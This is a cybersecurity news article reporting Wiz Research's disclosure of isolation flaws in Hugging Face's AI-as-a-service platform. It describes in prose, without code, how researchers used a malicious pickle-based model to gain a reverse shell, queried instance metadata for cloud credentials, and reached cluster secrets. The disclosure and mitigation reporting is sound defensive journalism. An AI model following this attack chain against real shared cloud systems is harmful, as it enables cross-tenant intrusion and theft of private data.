Saturday, December 14, 2024
HomeArtificial IntelligenceAI-As-A-Service Providers Vulnerability Let Attackers Perform Cross-Tenant Attacks

AI-As-A-Service Providers Vulnerability Let Attackers Perform Cross-Tenant Attacks

Published on

SIEM as a Service

The fast acceptance of AI has serious security issues, as this necessitates strict security measures to be put in place for the protection of sensitive information within shared cloud AI infrastructure.

Wiz Research, a cybersecurity firm, in collaboration with AI-as-a-Service firms, recently discovered some common security flaws across the sector that could expose users’ personal data and models.

The implications of these findings have to be taken seriously considering AI services are now available in more than 70% of cloud environments.

- Advertisement - SIEM as a Service

AI-As-A-Service Providers Vulnerability

Malicious models pose a severe threat, enabling cross-tenant attacks and access to millions of private AI models and apps within AI-as-a-service providers. Wiz uncovered critical risks in Hugging Face’s environment:-

  • Shared inference infrastructure takeover risk via untrusted pickle-serialized models with potential remote code execution payloads.
  • Shared CI/CD takeover risk through malicious AI applications compromising the pipeline for supply chain attacks.

When securing AI/ML systems, several factors, such as the AI model being used, the application code that uses the model, and the inference infrastructure deploying the model, must be taken into account.

AI-As-A-Service Providers Vulnerability (Source -Wiz)

Malicious people can use various methods to attack each component, including malicious input for models, insecure application code that processes the results of a model, and pickled models that compromise inference infrastructures. 

This involves downloading unreliable AI models, similar to embedding untrustworthy codes into applications.

Hugging Face research team focused on isolation flaws in AI-as-a-service setups, examining the company’s major products: 

  • Inference API
  • Inference Endpoints
  • Spaces
Inference API (Source -Wiz)

However, Hugging Face’s analysis and warnings of insecure Pickle-based PyTorch models still allow inferring potentially malicious models. 

On the other hand, researchers developed a harmful PyTorch model that runs arbitrary code when loaded and remotely executes code by using Inference API to interact with it.

Researchers achieved shell-like functionality by hooking into Hugging Face’s post-deserialization inference results management code.

This demonstrates how untrusted AI models in shared compute services are at great risk due to inadequate isolation.

As a result of gaining a reverse shell through the Hugging Face Inference API, researchers realized that they were inside one pod within an Amazon EKS Kubernetes cluster.

They exploited common misconfigurations like querying the node’s IMDS to get the node role and cluster name via AWS permissions.

With node role privileges, these people got access to pod information as well as secrets that brought to light the risks of lateral movement and data leakage.

Moreover, it also executed code by using a malicious Dockerfile in Hugging Face Spaces, which demonstrated potential supply chain attack vectors caused by network isolation issues in the container registry. 

Researchers urged to allow IMDSv2 with Hop limits, apply tighter access controls, and impose authentication measures for securing shared AI environment.

Secure your emails in a heartbeat! Take Trustifi free 30-second assessment and get matched with your ideal email security vendor - Try Here
Tushar Subhra
Tushar Subhra
Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Latest articles

“Password Era is Ending,” Microsoft to Delete 1 Billion Passwords

Microsoft has announced that it is currently blocking an astounding 7,000 password attacks every...

Over 300,000 Prometheus Servers Vulnerable to DoS Attacks Due to RepoJacking Exploit

The research identified vulnerabilities in Prometheus, including information disclosure from exposed servers, DoS risks...

Reyee OS IoT Devices Compromised: Over-The-Air Attack Bypasses Wi-Fi Logins

Researchers discovered multiple vulnerabilities in Ruijie Networks' cloud-connected devices. By exploiting these vulnerabilities, attackers...

New Android Banking Malware Attacking Indian Banks To Steal Login Credentials

Researchers have discovered a new Android banking trojan targeting Indian users, and this malware...

API Security Webinar

72 Hours to Audit-Ready API Security

APIs present a unique challenge in this landscape, as risk assessment and mitigation are often hindered by incomplete API inventories and insufficient documentation.

Join Vivek Gopalan, VP of Products at Indusface, in this insightful webinar as he unveils a practical framework for discovering, assessing, and addressing open API vulnerabilities within just 72 hours.

Discussion points

API Discovery: Techniques to identify and map your public APIs comprehensively.
Vulnerability Scanning: Best practices for API vulnerability analysis and penetration testing.
Clean Reporting: Steps to generate a clean, audit-ready vulnerability report within 72 hours.

More like this

“Password Era is Ending,” Microsoft to Delete 1 Billion Passwords

Microsoft has announced that it is currently blocking an astounding 7,000 password attacks every...

Over 300,000 Prometheus Servers Vulnerable to DoS Attacks Due to RepoJacking Exploit

The research identified vulnerabilities in Prometheus, including information disclosure from exposed servers, DoS risks...

Reyee OS IoT Devices Compromised: Over-The-Air Attack Bypasses Wi-Fi Logins

Researchers discovered multiple vulnerabilities in Ruijie Networks' cloud-connected devices. By exploiting these vulnerabilities, attackers...